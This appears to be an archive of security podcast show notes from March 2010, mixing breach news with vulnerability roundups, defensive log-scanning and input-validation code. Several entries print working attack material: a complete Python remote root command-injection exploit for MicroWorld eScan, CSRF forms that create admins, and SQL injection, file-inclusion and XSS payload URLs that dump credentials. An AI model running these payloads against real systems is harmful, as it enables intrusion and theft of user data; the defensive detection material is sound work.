News item 3: http://www.computerworld.com/s/article/9174078/iPhone_Safari_IE8_Firefox_all_fall_on_day_one_of_Pwn2Own?taxonomyId=17
Hackers took down Apple’s iPhone and Safari browser, Microsoft’s Internet Explorer 8 (IE8) and Mozilla’s Firefox within minutes at today’s Pwn2Own contest, as expected.

The two-man team of Vincenzo Iozzo and Ralf-Philipp Weinmann exploited the iPhone in under five minutes, said a spokeswoman for 3Com TippingPoint, the security company that sponsored the contest. The pair also walked away with $15,000 in cash, a record prize for the challenge, which is in its fourth year.

Iozzo, an Italian college student, works for Zynamics GmbH, the company headed by noted researcher Thomas Dullien, better known as Halvar Flake, while Weinmann is a post-doctoral researcher at the Laboratory of Algorithms, Cryptology and Security at the University of Luxembourg.

Weinmann is probably best known for being part of a three-man team that in 2007 demonstrated how to crack the Wi-Fi security protocol WEP much faster than previously thought possible.

News item 4: https://www.infosecisland.com/articleview/3392-Durex-condom-orders-exposed-on-the-Internet.html

Earlier we talked about a security problem involving the web site of a Durex product. On March 5, a customer reportedly discovered that anyone could view his and other customers’ orders on the kohinoorpassion.com web site by simply inserting a different order ID number in the URL, without any login required. Names, addresses, phone numbers, and type of products ordered were all there for ready viewing. The orders had not been placed on the kohinoorpassion.com web site, but on the Durex India e-store site.

From what the customer could determine, the earliest order exposed online dated back to February 23, 2009, but there is no confirmation as to how long the customer records might have been accessible without a login. According to the customer’s web site about the breach, no credit card or financial data were exposed.

The customer reported that he promptly contacted TTK-LIG (the marketer of the Durex brand in India and manufacturer of Kohinoor condoms) and SSL International (the owner of the Durex brand worldwide) about the problem and that by the next day, the site appeared to be better secured. But that wasn’t the end of the story, it seems. The customer created his own web site and FAQ about the breach and has been updating it since then. A review of the updates suggests that things took an ugly turn within a matter of weeks.

2010
03.25

Episode 95 – OuterZone Review

InfoSec Daily Podcast

 
ISD Podcast Episode 95 for March 25, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

  • April 15th – 18th, 2010 Cleveland, Ohio
  • http://notacon.org/
  • Adrian will be there presenting on Anti-Forensics

Kentuckiana Metasploit Class

  • May 8, 2010 Jeffersonville, Indiana
  • (No URL for that as of yet)
  • Proceeds will be going to the Hackers for Charity Food For Work Program

Friends of the Podcast:

Webhosting services: WebSpeedway

Vulnerabilities of Interest:

  1. uhttp Server is subject to a Path Traversal vulnerability. Version 0.1.0-alpha is affected, though others may be as well.  The problem is that characters usable for attacks such as directory traversal are not filtered: the path traversal sequence (‘../’) is not checked, so it can be used to walk the directories of the affected system.  Example request is available: GET /../../../../../../etc/passwd HTTP/1.1
  2. Harris Stratex 2100 subscriber station is subject to a Cross Site Request Forgery vulnerability.  This vulnerability would allow an attacker to view the running configuration without authentication.  Version 3.0.4.1.7.C is impacted.  Example HTML code is available:
    <html>
    <body>
    <body xonload="config.submit();">
    <form method="get" action="http:192.168.1.1/frameCmd6.html">
    <input value="Current Configuration">
    </form>
    </body>
    </html>
  3. The Joomla Component com_gds is subject to a SQL Injection vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_gds&task=store&Storeid=-1+UNION+SELECT+1,2,3,4,5,6--
  4. The Joomla Component com_cx is subject to a SQL Injection vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_cx&task=postview&postid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--
  5. The Joomla Component J!Research is subject to a Local File Inclusion (LFI) vulnerability.  This could be exploited by an attacker to expose sensitive data.  Example URL is available: http://www.sample.com/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00
  6. The Joomla Component com_cb is subject to a SQL Injection vulnerability because it fails to sanitize user supplied inputs used in a SQL query.  Example URL is available: http://www.sample.com/index.php?option=com_cb&task=list&cat=-1+UNION+SELECT+1,2,3,4,5--
  7. The Joomla Component SMEStorage is subject to a Local File Inclusion (LFI) vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_smestorage&controller=[LFI]%00
  8. The Joomla Component com_jwmmxtd is subject to a Remote File Inclusion (RFI) vulnerability.  Example URL is available: http://www.sample.com/administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path= [inj3ct0r]
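The eight items above, together with the Easy-Clanpage entry in the March 26 notes, leave distinctive marks in a web server's access log: "../" and "%00" in a parameter (items 1, 5, 7), a parameter whose value is itself a URL (item 8 and the com_universal RFI), "UNION SELECT" with "/**/" or "+" standing in for spaces (items 3, 4, 6), and, for the blind brute-force script, a burst of requests from one source that differ only in the ascii(substring(...)) threshold. As an added example (not code from the podcast or from any of the listed projects), the Python below runs those checks over constructed log lines modelled on the example URLs; the IPs, hostnames and timestamps are made up for the example.

```python
import re
import urllib.parse
from collections import Counter

# Constructed combined-format access-log lines.  IPs are documentation
# addresses; the request targets mirror the shapes of the example URLs in
# the listings but are not real captures.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Mar/2010:10:01:02 +0000] "GET /index.php?p=news HTTP/1.1" 200 512',
    '203.0.113.7 - - [25/Mar/2010:10:01:03 +0000] "GET /index.php?p=../../../../etc/passwd%00 HTTP/1.1" 200 1307',
    '203.0.113.7 - - [25/Mar/2010:10:01:04 +0000] "GET /administrator/components/com_x/config.html.php?mosConfig_absolute_path=http://203.0.113.99/r.txt? HTTP/1.1" 200 88',
    '203.0.113.8 - - [25/Mar/2010:10:01:05 +0000] "GET /?section=user&action=details&id=-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4/**/from/**/ecp_user HTTP/1.1" 200 2048',
    '203.0.113.9 - - [25/Mar/2010:10:01:06 +0000] "GET /index.php?option=com_jresearch&controller=..%2F..%2F..%2Fproc%2Fself%2Fenviron%00 HTTP/1.1" 200 4096',
]
# Six boolean-blind probes from one source, each testing one ASCII threshold
# of one character, the request shape the brute-force script produces.
SAMPLE_LOG += [
    f'203.0.113.10 - - [25/Mar/2010:10:02:{i:02d} +0000] "GET /index.php?section=user&func=stats'
    f'&id=1+and+1=1+and+ascii(substring((SELECT+password+FROM+ecp_user+WHERE+userID=1+LIMIT+0,1),1,1))%3E{n} HTTP/1.1" 200 300'
    for i, n in enumerate((48, 64, 96, 100, 98, 97))
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Detection rules, applied to the normalised request target.
RULES = [
    ("path_traversal", re.compile(r"\.\.[/\\]")),
    ("null_byte", re.compile("\x00")),
    ("remote_file_inclusion", re.compile(r"=\s*(?:https?|ftp)://")),
    ("sql_injection", re.compile(
        r"\bunion\s+(?:all\s+)?select\b|\bconcat\s*\(|\b(?:and|or)\s+\d+\s*=\s*\d+\b")),
    ("blind_sqli_oracle", re.compile(r"\bascii\s*\(\s*substring\s*\(")),
]


def normalize(target):
    """Canonical form for matching: percent-decode twice (catches %25xx
    double encoding), treat '+' as space, replace /**/ comments used as
    whitespace with a space, and lowercase."""
    s = urllib.parse.unquote_plus(target)
    s = urllib.parse.unquote_plus(s)
    s = re.sub(r"/\*.*?\*/", " ", s)
    return s.lower()


def analyze(lines, blind_threshold=5):
    """Scan log lines.  Returns (findings, alerts): findings is a list of
    (ip, rule, raw_target); alerts lists sources whose number of
    ascii(substring(...)) probes reached blind_threshold."""
    findings = []
    oracle_hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the scan
        ip, target = m.group("ip"), m.group("target")
        norm = normalize(target)
        for name, rx in RULES:
            if rx.search(norm):
                findings.append((ip, name, target))
                if name == "blind_sqli_oracle":
                    oracle_hits[ip] += 1
    alerts = [(ip, "blind_sqli_bruteforce", n)
              for ip, n in oracle_hits.items() if n >= blind_threshold]
    return findings, alerts


def rules_by_source(findings):
    """Collapse findings to {ip: set(rule names)} for reporting."""
    summary = {}
    for ip, rule, _ in findings:
        summary.setdefault(ip, set()).add(rule)
    return summary


if __name__ == "__main__":
    found, alerts = analyze(SAMPLE_LOG)
    for ip, rules in sorted(rules_by_source(found).items()):
        print(ip, sorted(rules))
    for ip, kind, n in alerts:
        print("ALERT", ip, kind, n, "probes")
```

Normalising before matching is the part that matters: "/**/union/**/select" and "uNIoN+sElECt" both become "union select", and a double-encoded "..%252F" still decodes to "../". The per-source counter is what separates a single odd request from the hundreds a character-by-character brute force needs, so the threshold is the knob to tune against real traffic.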

OuterZone Review

http://dc949.org/projects/floodgate/

2010
03.24

InfoSec Daily Podcast

 
ISD Podcast Episode 94 for March 24, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Friends of the Podcast:

Webhosting services: WebSpeedway

Vulnerabilities of Interest:

  1. Webmatic is subject to a Cross Site Scripting vulnerability. This flaw exists because the application does not validate multiple variables and form fields upon submission to the ‘index.php’ script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user’s browser within the trust relationship between the browser and the server, leading to a loss of integrity. Version 3.0.3 is impacted, though it is possible that prior versions may be affected as well.  To exploit a cross-site scripting issue, the attacker must entice an unsuspecting user to follow a malicious URL.
  2. Fw-BofF (oolime-resurrection) is subject to Multiple Remote Include Vulnerabilities. Version 1.5.3beta is impacted, though it is possible that prior versions may be affected as well.  Example RFI URL is available:

    http://www.sample.com/core/dispatcher.php?configRootDir=[Shell]

    Example LFI URL is available: http://www.sample.com/core/database.php?configDBchoice=[LFI%00]

  3. The PHP-Kit b-day.php add-on is subject to a SQL injection vulnerability because the application fails to sufficiently sanitize user supplied input used in a query. Example URL is available:

    http://www.sample.com/include.php?path=bday.php&ausgabe=11+uNIoN+sElECt+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1--

  4. PowieSys is subject to an index.php (shownews) SQL Injection Vulnerability. Version 0.7.7 alpha is impacted as well as all prior versions.  Example URL is available:

    http://www.sample.com/news/index.php?shownews=999999'+union+select+1,2,3,4,concat(nickname,0x3a,pwd,0x3a,email),6,7,8,9,10,11,12,13+from+powie_pfuser+where+id=1--+

  5. Aris AGX agXchange ESM is subject to an Open Redirection Vulnerability. Exploitation of this vulnerability results in the redirection of users using a malicious link.  Example URL is available:

    http://www.sample.com/[agx_application]/pages/ucschcancelproc.jsp?returnpage=http://www.RedirectExample.com

  6. Yupi CMS is subject to a Remote File Inclusion (RFI) vulnerability. Exploitation of this vulnerability results in the redirection of users using a malicious link.  Version 0.44 is impacted.  Example URL is available:

    http://www.sample.com/filemanager/connectors/php/config.php?clientDir=[inj3ct0r]

  7. RepairShop2 is subject to a Cross Site Scripting vulnerability. This flaw exists because the application does not validate multiple variables and form fields upon submission. Version 1.9.023 is impacted.  Example URL is available:

    http://www.sample.com/shop/?b=products.details&prod=[INDONESIANCODER]

  8. Zephyrus CMS is subject to a remote SQL injection vulnerability. This flaw exists because the application fails to sufficiently sanitize user-supplied input in a SQL query. Example URL is available:
    http://www.sample.com/index.php?pagina=news&id=[SQL Injection]
  9. Xataface is subject to an admin authentication bypass vulnerability. Exploiting this could allow an attacker to edit, delete or create records in the database, create new admin accounts and view all users and passwords. Example URL is available:

    http://www.sample.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list

  10. Multiple MicroWorld eScan products are vulnerable to a remote command-execution vulnerability because they fail to properly sanitize user-supplied input.  Attackers can exploit this issue to execute arbitrary commands with superuser privileges. Successful attacks will completely compromise affected computers. The issue affects versions prior to 4.1.x of the following products: eScan for Linux Desktop, eScan for Linux File Servers, MailScan for Linux Mailservers and WebScan for Linux Proxy Servers.  Exploit code is available:
    #!/usr/bin/env python
    import sys
    from socket import *

    #author: Mohammed almutairi
    #(Sa.attacker@gmail.com)
    """
    MicroWorld eScan Antivirus < 3.x  Remote Root Command Execution
    Package MWADMIN package vulnerabilities (linux)
    The Base Packages (MWADMIN and MWAV) must be installed before eScan
    Link:

    http://www.escanav.com/english/content/products/escan_linux/linux_products.asp

    infected: all version 3.X eScan linux
    1-Escan for Linux Desktop
    2-Escan for Linux file Servers
    3-MailScan for Linux and webscan
    Tested On RedHat  and Fedora
    ULTRA PRIV8 :)

    Description:

    From /opt/MicroWorld/var/www/htdocs/forgotpassword.php:
    include("common_functions.php");  <--> (1)

    if ($_POST['forgot'] == "Send Password")
    {
    $user = $_POST["uname"]; <-->(2) insecure:(

    vulnerable code in forgotpassword.php and common_functions.php
    in (1) $runasroot = "/opt/MicroWorld/sbin/runasroot";
    we can inject through the file forgotpassword.php as you can see in (2)
    with remote root command execution
    >> eScan.py www.***.com
    eScan@/bin/sh:$Sa$ => reboot
    [*] Done! sent to: www.***.com
    """

    def xpl():
        if len(sys.argv) < 2:
            print "[*] MicroWorld eScan Antivirus Remote Root Command Execution"
            print "[*] exploited by Mohammed almutairi"
            print "[*] usage: %s host" % sys.argv[0]
            return

        host = sys.argv[1]
        port = 10080 # default port
        cmd = raw_input("eScan@/bin/sh:$Sa$ => ")
        sock = socket(AF_INET, SOCK_STREAM)
        sock.connect((host, port))
        sh = "/opt/MicroWorld/sbin/runasroot /bin/sh -c '%s'" % cmd

        sa = "uname=;%s;" % sh  # (;sh;)  --> see (2) above
        sa += "&forgot=Send+Password"

        s = "POST /forgotpassword.php HTTP/1.1\r\n"
        s += "Host: %s:%d\r\n" % (host, port)
        s += "User-Agent: */*\r\n"
        s += "Accept: ar,en-us;q=0.7,en;q=0.3\r\n"
        s += "Content-Type: application/x-www-form-urlencoded\r\n"
        s += "Content-Length: %d \r\n\r\n" % len(sa)
        s += sa

        sock.sendall(s)
        print "[*] Done! sent to: %s" % host
        sock.close()

    if __name__ == "__main__":
        xpl()
        sys.exit(0)

  11. The ‘com_jresearch’ component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.  Example URL is available: http://www.sample.com/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00
  12. Astaro Security Linux is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The issue affects Astaro Security Linux 5; other versions may also be affected. Example POST data is available: username=my@example.com&password=DTC&SID=>"><script>alert("XSS !!!")</script>&cur_width=1&window_height=700&id=0121&jaction=none&frameset=active&new_id=0
  13. Uiga Fan Club, Personal Portal and Business Portal are subject to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the applications, access or modify data, or exploit latent vulnerabilities in the underlying database.  Example URL is available: http://www.sample.com/forum/uigabusinessportal/index.php?view=photos&id=1+union+select+1,2,concat(user_id,0x3a,username,0x3a,password),4,5+from+tbl_user+where+user_id=1n–
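Every entry above is an input-handling flaw that leaves a recognisable trace in the web server's access log, so the same list doubles as a detection checklist. The following is an added example, not code from the podcast or from any of the affected projects: a small Python scanner that parses access-log lines and classifies query-string parameters into the five classes seen above (SQL injection, remote file inclusion, local file inclusion, cross-site scripting and open redirect). The log lines, client IPs, the placeholder include host and the list of redirect-style parameter names are constructed for the example; the attack strings are the ones quoted in the entries above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Mar/2010:10:00:01 +0000] "GET /news/index.php?shownews=999999'+union+select+1,2,concat(nickname,0x3a,pwd),6+from+powie_pfuser-- HTTP/1.1" 200 512
203.0.113.6 - - [31/Mar/2010:10:00:02 +0000] "GET /core/dispatcher.php?configRootDir=http://203.0.113.99/include.txt HTTP/1.1" 200 77
203.0.113.7 - - [31/Mar/2010:10:00:03 +0000] "GET /index.php?option=com_jresearch&controller=../../../../proc/self/environ%00 HTTP/1.1" 200 4096
203.0.113.8 - - [31/Mar/2010:10:00:04 +0000] "GET /NewsFeed/showPage.php?id=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 300
203.0.113.9 - - [31/Mar/2010:10:00:05 +0000] "GET /pages/ucschcancelproc.jsp?returnpage=http://www.RedirectExample.com HTTP/1.1" 302 0
203.0.113.10 - - [31/Mar/2010:10:00:06 +0000] "GET /index.php?pagina=news&id=42 HTTP/1.1" 200 2048
"""

# Common log format: client, ident, user, [timestamp], "METHOD target HTTP/x.y", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Heuristics applied to each *decoded* parameter value. They are deliberately
# simple; tune them against your own traffic before alerting on them.
SQLI_RE = re.compile(r"(?i)(\bunion\b[\s\S]*\bselect\b|'\s*(or|and)\b|--\s*$|\bconcat\s*\()")
XSS_RE = re.compile(r"(?i)(<\s*script|javascript:|\bon[a-z]+\s*=)")
LFI_RE = re.compile(r"(\.\./|\x00)")          # traversal or embedded null byte

# Parameter names that normally carry a redirect target (constructed list).
REDIRECT_PARAMS = {"returnpage", "redirect", "redir", "url", "next", "return", "goto"}


def is_absolute_url(value):
    """True if the value is a full URL with a scheme and host (http/https/ftp)."""
    parts = urlsplit(value)
    return parts.scheme.lower() in ("http", "https", "ftp") and bool(parts.netloc)


def classify_params(params):
    """Return the sorted list of attack classes suggested by (name, value) pairs."""
    findings = set()
    for name, value in params:
        if SQLI_RE.search(value):
            findings.add("sqli")
        if XSS_RE.search(value):
            findings.add("xss")
        if LFI_RE.search(value):
            findings.add("lfi")
        if is_absolute_url(value):
            # A full URL in a redirect-style parameter is an open-redirect probe;
            # in any other parameter it looks like remote file inclusion.
            findings.add("open_redirect" if name.lower() in REDIRECT_PARAMS else "rfi")
    return sorted(findings)


def parse_line(line):
    """Split one log line into ip, path, decoded query parameters and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes values, so %00 and %3Cscript%3E are seen as-is.
    params = parse_qsl(parts.query, keep_blank_values=True)
    return {"ip": m.group("ip"), "path": parts.path, "params": params,
            "status": int(m.group("status"))}


def scan(log_text):
    """Return (ip, path, findings) for every line that triggers a heuristic."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        findings = classify_params(rec["params"])
        if findings:
            alerts.append((rec["ip"], rec["path"], findings))
    return alerts


if __name__ == "__main__":
    for ip, path, findings in scan(SAMPLE_LOG):
        print("%-14s %-40s %s" % (ip, path, ",".join(findings)))
```

Only the last (benign) sample line produces no alert. Because the checks run on decoded values, URL-encoding the payload does not evade them, but the regexes are still heuristics: a `union select` in a legitimate search box will trigger the SQL rule, so treat the output as a triage queue rather than a block list.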
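Items 2, 5, 6, 10 and 11 above share one root cause: a request parameter is used directly as a redirect target, an include path or part of a shell command. The following added example (not code from the podcast or from any of the affected vendors) shows, in Python, the three server-side validations that close those paths: a same-site redirect check, an include lookup table instead of a path built from input, and an argv list for a privileged helper that is never handed to a shell. The allowed host, the template table and the helper path are assumptions chosen for the example.

```python
import re
from urllib.parse import urlsplit

# Assumed for the example: the only host this application may redirect to.
ALLOWED_REDIRECT_HOSTS = {"www.sample.com"}

# Assumed for the example: request value -> file that is actually included.
# The raw request value never becomes a path, so '../' and 'http://' values
# cannot reach the include call at all.
INCLUDABLE_PAGES = {
    "news": "templates/news.php",
    "contact": "templates/contact.php",
}

# Usernames the password-reset handler accepts: one token, bounded length,
# no whitespace, quotes or shell metacharacters.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")

# Assumed helper path for the example; the point is how argv is built.
RESET_HELPER = "/usr/local/sbin/reset-password"


def safe_redirect_target(returnpage, default="/"):
    """Return a redirect target that stays on this site, else `default`.

    Absolute URLs are accepted only for hosts in ALLOWED_REDIRECT_HOSTS.
    Scheme-relative targets ('//host'), non-http schemes and backslash
    variants all fall back to `default`.
    """
    if not returnpage:
        return default
    parts = urlsplit(returnpage)
    if parts.scheme or parts.netloc:
        if parts.scheme.lower() not in ("http", "https"):
            return default
        if parts.netloc.lower() not in ALLOWED_REDIRECT_HOSTS:
            return default
        return returnpage
    # Relative target: exactly one leading slash and no backslashes (some
    # browsers normalise '/\host' to a scheme-relative URL).
    if not returnpage.startswith("/") or returnpage.startswith("//") or "\\" in returnpage:
        return default
    return returnpage


def resolve_include(page):
    """Map a request parameter to a template by lookup; None if unknown."""
    return INCLUDABLE_PAGES.get(page)


def reset_helper_argv(username):
    """Build the argv list for the reset helper, or None if the name is invalid.

    Passing a list to subprocess.run() without shell=True means no shell ever
    parses the username; the regex rejects ';', quotes and whitespace before
    that point anyway, so a rejected value is also easy to log.
    """
    if not USERNAME_RE.match(username):
        return None
    return [RESET_HELPER, "--user", username]


if __name__ == "__main__":
    print(safe_redirect_target("http://www.RedirectExample.com"))  # falls back to "/"
    print(resolve_include("../../../../proc/self/environ\x00"))    # None: not in the table
    print(reset_helper_argv("alice;id"))                           # None: rejected by the regex
```

The redirect check keys on the host after parsing rather than on a string prefix, which is what defeats `http://www.sample.com@other-host/` and `//other-host/` style values; the include and command cases avoid the problem entirely by never letting the request value become a path or a shell string.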

Stories of Interest:
News item 1: http://fcw.com/articles/2010/03/19/einstein-3-test-intrusion-prevention-system.aspx
The Homeland Security Department plans to partner with a commercial Internet Service Provider and another government agency to pilot technology developed by the National Security Agency to automate the process of detecting cyber intrusions into civilian agencies' systems, making it possible to thwart the attacks before damage is done.

The new technologies and automated processes of Einstein 3 are improvements over Einstein 1 and 2 technology, DHS officials said. Einstein 3's predecessors focused on intrusion detection, allowing analysts to scan records of connections to agencies' systems and use signatures to scan network traffic for cyber threats. Einstein 3 would add the ability to prevent those intrusions.

Einstein 3 also would improve information sharing by DHS’ U.S. Computer Emergency Readiness Team (US-CERT), allowing the department to automate the process for sending alerts about detected network intrusions.

News item 2: http://norton.newslinevine.com/

If you live in Seattle, Boston, Washington, D.C., San Francisco, or Raleigh, N.C., then you’re in one of the top five riskiest cities when it comes to cybercrime.

But it's not where you live that makes it more dangerous, it's the type of activities that people in these cities tend to do, according to Symantec Internet safety advocate Marian Merritt.

“Some of the common factors for residents of those cities would be highly educated, affluent, a lot of people using tech all day long in a variety of fashions,” Merritt said. “It’s those activities that have more to do with increasing their risk than the ZIP code that they live in.”

The following are ranked the Norton Top 10 Riskiest Online Cities:

1.) Seattle
2.) Boston
3.) Washington, D.C.
4.) San Francisco
5.) Raleigh, N.C.
6.) Atlanta
7.) Minneapolis
8.) Denver
9.) Austin, Texas
10.) Portland, Ore.

News item 3: http://www.gao.gov/new.items/d10355.pdf

In a study (PDF) issued last week, the Government Accountability Office states that the IRS has corrected less than one-third of the 89 security weaknesses identified in its audit of the tax agency last year.

“While IRS has corrected 28 control weaknesses and program deficiencies, 61 of them — or about 69 percent — remain unresolved or unmitigated,” the report states. “For example, IRS continued to install patches in an untimely manner and used passwords that were not complex. In addition, IRS did not always verify that remedial actions were implemented, or effectively mitigate the security weaknesses.”

Weaknesses in IRS systems “continue to jeopardize the confidentiality, integrity, and availability of financial and sensitive taxpayer information,” the GAO says. “IRS did not consistently implement controls that were intended to prevent, limit, and detect unauthorized access to its systems and information.

“For example,” the report continues, “IRS did not always (1) enforce strong password management for properly identifying and authenticating users; (2) authorize user access to permit only the access needed to perform job functions; (3) log and monitor security events on a key system; and (4) physically protect its computer resources.”

A key reason for the slow resolution of the vulnerabilities is that the IRS has not yet fully implemented its agencywide IT security program to ensure controls are appropriately designed and operating effectively, the GAO says. The agency hasn’t been conducting annual reviews of risk assessments, for example, and it hasn’t been checking to ensure contractors received security awareness training.

“Until these control weaknesses and program deficiencies are corrected, the agency remains unnecessarily vulnerable to insider threats related to the unauthorized access to and disclosure, modification, or destruction of financial and taxpayer information, as well as the disruption of system operations and services,” the report says.

News item 4: http://www.wired.com/threatlevel/2010/03/gonzalez-gov-memo/
Albert Gonzalez should be sentenced to 25 years behind bars for leading a gang of cyberthieves who stole tens of millions of credit and debit card numbers from a transaction processor and several giant retail chains, federal prosecutors argued in a court filing.

“[T]he sentences would be the longest ever imposed in an identity theft case and among the longest imposed for a financial crime, which is appropriate because Gonzalez was at the center of the largest and most costly series of identity thefts in the nation’s history,” wrote Boston-based Assistant U.S. Attorney Stephen Heymann. “He knowingly victimized a group of people whose population exceeded that of many
major cities and some states.”

The government also disputed a defense claim that Gonzalez suffers from Asperger’s disorder, a mild form of autism that was grounds for a slightly reduced sentence in a previous hacking prosecution.

Gonzalez, 28, is set for sentencing next week on three indictments covering virtually every headline-making bank-card theft in recent years, including intrusions at TJX, DSW Shoe Warehouse, Office Max, Hannaford Brothers, 7-Eleven, and Heartland Payment Systems, which alone exposed magstripe data on 130 million credit and debit cards. He performed the intrusions while an informant for the Secret Service.

News item 5:  http://www.wired.com/threatlevel/2010/03/gonzalez-salary/
Convicted TJX hacker Albert Gonzalez earned $75,000 a year working undercover for the U.S. Secret Service, informing on bank card thieves before he was arrested in 2008 for running his own multimillion-dollar card-hacking operation.

The information comes from one of Gonzalez's best friends and convicted accomplices, Stephen Watt. Watt pleaded guilty last year to creating a sniffer program that Gonzalez used to siphon millions of credit and debit card numbers from the TJX corporate network while he was working undercover for the government.

Watt said that Gonzalez was paid in cash, which is generally done to protect someone’s status as a confidential informant. The Secret Service said it would not comment on payments made to informants.

“It’s a significant amount of money to pay an informant but it’s not an outrageous amount to pay if the guy was working full time and delivering good results,” says former federal prosecutor Mark Rasch. “It’s probably the only thing he was doing – other than hacking into TJX and making millions of dollars.”

2010
03.23

Episode 93 – Where’s Shoe?

InfoSec Daily Podcast

 
ISD Podcast Episode 93 for March 23, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

    1. NinkoBB is subject to a cross-site request forgery vulnerability that would allow an attacker to change an administrator's username and/or password, or to add a new administrator.  Version 1.3RC4 is impacted, though others may be as well.  Exploit code is available:
      #
      Author: ItSecTeam
      download from:http://ninkobb.com/releases/?NinkoBB-1.3RC4.zip
      script:NinkoBB 1.3RC4
      update:2010
      —————————————–
      xpl:
      <html>
      <head>
      <body>
      <h2>coded by ahmadbady</h2>
      <td colspan=”6″>Admin Control Panel
      - Editing User</td>
      </tr>
      <form name=”form” method=”post”
      action=”admin.php?a=users&edit=1″>
      <td >
      <dl>
      <dt>Username</dt>
      <dd><input
      class=”border” style=”width: 40%”
      value=”anything”></dd>
      <dl >
      <dt>Settings<br /><br />
      <span></span>
      <dd><input />
      banned</dd>
      <dd><input
      /> moderator</dd>
      <dd><input
      checked /> admin</dd>
      <dl >
      <dt>Email</dt>
      <dd><input type=”text”
      class=”border” style=”width: 40%”
      value=”"></dd>
      <dl >
      <dt>New Password</dt>
      <dd><input
      class=”border” style=”width: 40%”></dd>
      <dl>
      <dt>New Password Again</dt>
      <dd><input name=”npassworda”
      class=”border” style=”width: 40%”></dd>
      <dl >
      <dt> </dt>
      <dd><input type=”submit”
      name=”edit” value=”submit”></dd>
      </body>
      </html>

      ########################
      discovered by ahmadbady
      ########################

    2. Zigurrat CMS is subject to a SQL injection vulnerability because it fails to properly sanitize user-supplied input used in a SQL query.   This could allow an attacker to compromise the underlying database or completely compromise the system.  Example URLs are available:

      http://www.sample.com/manager/textbox.asp?id=’

      http://www.sample.com/manager/textbox.asp?id=0′

      http://www.sample.com/manager/textbox.asp?id=%2527

      http://www.sample.com/manager/textbox.asp?id=<number> UNION SELECT*FROM VALIDTBLNAME’

    3. Quality Point NewsFeed is subject to SQL injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input used in a SQL query and in page output.   This could allow an attacker to compromise the underlying database or completely compromise the system.  Version 1.0 is impacted, though others may be as well.  Example URLs are available:
      SQL: http://www.sample.com/NewsFeed/showPage.php?id=-348+union+select+1,concat%28email,0x3e,version%28%29,0x3e,password%29,3,4,5+from+qualityp_fnt.users%20–
      XSS: http://www.sample.com/NewsFeed/showPage.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
    4. Flex CMS is subject to a blind SQL injection vulnerability because it fails to properly sanitize user-supplied input used in a SQL query.   This could allow an attacker to compromise the underlying database or completely compromise the system.  Version <= 2.5 is impacted, though others may be as well.  Example vulnerable file (index.php):
      $CookieData = $HTTP_COOKIE_VARS[$CookieName];

      $LoggedIn = 'n';
      $UserLevel = 0;

      if ($CookieData != '' && $CookieData != 'not_logged_in') {
          list ($CookieUsername, $CookiePassword) = split('==', $CookieData, 2);

